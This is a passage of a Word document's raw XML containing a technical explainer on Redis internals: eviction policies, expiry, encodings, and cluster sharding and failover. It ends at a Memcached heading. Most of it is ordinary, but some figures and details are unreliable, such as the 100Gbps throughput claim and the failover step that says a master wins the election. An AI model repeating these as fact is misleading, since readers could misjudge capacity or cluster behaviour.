    <w:p w14:paraId="444E77F7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Used by: LMDB, LevelDB's SST files, memory-mapped analytics files (Parquet via Arrow). The OS manages cache eviction — if memory pressure occurs, mapped pages are evicted and reloaded from disk on next access (transparently to the application).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115D198C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="5EC67A24">
          <v:rect id="_x0000_i4789" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA9C908" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Distributed Caching — The Architecture of Shared Caches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B920215" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis — Deep Internal Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B66D917" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Redis is the dominant distributed cache. Its performance characteristics and design decisions are worth understanding in depth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A30BC4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The single-threaded event loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410731D3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Redis processes commands in a </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>single-threaded event loop</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> (for command execution — I/O multiplexing uses epoll/kqueue with multiple threads in Redis 6+). All commands execute sequentially, no locking on data structures. This design choice means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0F3A67" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1354"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No lock contention:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Multiple clients can't corrupt shared state because only one command executes at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F405795" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1354"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Predictable latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Commands don't queue behind locks. Latency is dominated by command complexity, not lock wait time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626CEAFC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1354"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CPU bound on a single core:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Redis saturates one CPU core before network or memory becomes the bottleneck. At ~100,000–1,000,000 simple commands per second, a single Redis instance saturates around 100Gbps of network bandwidth (the real bottleneck for very high-throughput deployments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077FA921" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis I/O threading (Redis 6+):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478819D3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Redis 6 introduced multi-threaded I/O — network reads and writes are handled by multiple I/O threads, but command execution remains single-threaded. This allows Redis to saturate multi-core systems' network interfaces while maintaining the simplicity of single-threaded command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B538E64" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8A6AE4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Redis uses </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jemalloc</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> as its allocator rather than glibc's malloc. jemalloc provides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C33A17D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1355"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Arena-based allocation:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Thread-local arenas reduce lock contention (though Redis is single-threaded, jemalloc's design still benefits from reduced fragmentation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C7317F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1355"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Size class bucketing:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Allocations are rounded up to the nearest size class (8, 16, 32, 48, 64... bytes), reducing fragmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC29CFE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1355"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transparent huge page support:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Large allocations use huge pages automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040D9D89" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The maxmemory policy and eviction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19613B68" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>When Redis reaches its configured maxmemory limit, it must evict keys to make room. Eviction policies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4230C5D2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>noeviction:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Return errors on writes when memory is full. Forces callers to handle the error. Appropriate when data loss is unacceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6421D63D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>allkeys-lru:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Evict the least recently used key across all keys. Redis uses </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>approximated LRU</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — samples N random keys (default N=5, configurable with maxmemory-samples), evicts the one with the oldest access time. True LRU requires O(1) updates and O(N) space for maintaining access order — approximated LRU with sampling achieves near-LRU behavior with O(1) time and O(1) space overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0124D0E9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>allkeys-lfu:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Evict the least frequently used key. LFU is superior to LRU for workloads where access patterns are stable over time — a key accessed 1,000 times an hour is more valuable than a key accessed once a minute ago. Redis implements LFU with a </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Morris counter</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"> — a probabilistic counter that uses only 8 bits (0–255) to approximate frequencies up to millions. The counter increments with decreasing probability as it grows (logarithmic </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>scale), and decays over time based on lfu-decay-time. This allows approximate LFU with negligible memory overhead per key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6F1996" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>volatile-lru/lfu/ttl:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Like allkeys variants but only among keys with TTLs set. Keys without TTLs are never evicted — treat them as permanent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D35905F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The key expiry mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF05BB7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Redis uses two complementary expiry mechanisms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FB2EBC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Lazy expiry:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> When a key is accessed, Redis checks if it's past its TTL. If expired, delete it and return nil. Zero background overhead — expiry is triggered by access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3C9F10" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Active expiry (active cycle):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Every 100ms, Redis runs an expiry cycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAF0E90" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1356"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Sample 20 random keys from the set of keys with TTLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE9DEE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1356"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Expire any that are past their TTL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D716E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1356"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>If more than 25% of sampled keys were expired → repeat immediately (indicating a large expiry backlog).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4544C2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1356"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:t>Continue until &lt;25% of samples are expired or a time budget is exhausted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286B7802" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>This combination ensures expired keys are collected promptly without dedicated background threads or O(N) scans of all keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE79AAD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The consequence:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> An expired key is </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not guaranteed to be deleted immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> after its TTL. It will be deleted either on next access (lazy) or within one active expiry cycle (up to 100ms + processing time). Redis's reported memory usage may temporarily include expired-but-not-yet-collected keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7925B04B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis data structures and their internal representations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E91818" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Redis's memory efficiency comes from choosing compact internal representations based on data size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4E2B75" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>String:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> For small strings (&lt;44 bytes), uses </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>embstr</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — the Redis object and the string are allocated in a single contiguous block. For larger strings: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rawstr</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — separate allocation. Integers are stored as integers (not string bytes) when possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E60012" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Hash:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> For small hashes (&lt;128 fields, field values &lt;64 bytes): </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>listpack</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> (formerly ziplist) — a compact doubly-linked list serialized as a contiguous memory block with no pointers. Each entry includes the length of the previous entry (for backward traversal) and the entry's own length. O(N) lookup but extremely cache-friendly and memory-efficient. For large hashes: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — standard separate-chaining hash table with O(1) average lookup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D80D8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sorted Set (ZSet):</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Small ZSets: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>listpack</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> (sorted by score, O(N) operations). Large ZSets: </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>skiplist + hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> — the skiplist maintains sorted order for range queries, the hashtable provides O(1) score lookup by member. The dual data structure trades memory for time complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A648AD3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>The listpack compact encoding is significant:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> For a cache storing millions of small hash objects (session data, user preferences), the listpack encoding can reduce memory usage by 3–5× compared to full hashtable encoding. The configuration knobs (hash-max-listpack-entries, hash-max-listpack-value) control when the transition occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2EAEE0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Redis Cluster — Horizontal Scaling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF78245" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Redis Cluster shards data across multiple nodes using </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>consistent hashing over hash slots</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t>. The keyspace is divided into 16,384 slots (slot = CRC16(key) % 16384). Each master node owns a subset of slots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D6210" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hash tags for co-location:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B7E737" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2DF5EE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>HSET {user:123}:session ... → slot = CRC16("user:123") % 16384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24409A35" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>HSET {user:123}:preferences ... → slot = CRC16("user:123") % 16384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68A890" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Keys with the same text in {} (hash tag) map to the same slot → same node. This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>multi-key operations</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> (MGET, transactions, Lua scripts) on related keys — they're guaranteed to be on the same node. Without hash tags, related keys may be on different nodes, breaking multi-key atomicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131776D4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cluster bus (gossip protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063666AE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Redis Cluster nodes communicate their state via a gossip protocol on port client_port + 10000. Every node periodically sends a PING to a random subset of other nodes, including cluster state information (which nodes are alive, which slots each node owns). Nodes detect failures when they don't receive PONG within a timeout — they mark the node as PFAIL (probably failed). When a majority of masters mark a node as PFAIL, it transitions to FAIL and failover begins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700DD582" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cluster failover mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC4D42F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D07EF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Master M1 fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F63525" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  → Replicas of M1 detect failure (no response within cluster-node-timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51616D56" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → Replicas request votes from other masters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC4C1E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  → Master with most up-to-date replication offset wins election</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F0E680" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  → Winner sends FAILOVER_AUTH_ACK, claims M1's slots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7A0E7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  → Cluster state updated, clients redirect to new master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A74A70B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483924C4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Failover time: typically 10-30 seconds (cluster-node-timeout default: 15s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53444FE3" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memcached — The Comparison Point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB9ABC0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Memcached predates Redis but remains relevant for specific use cases. Its internal design contrasts sharply with Redis:</w:t>
      </w:r>
    </w:p>
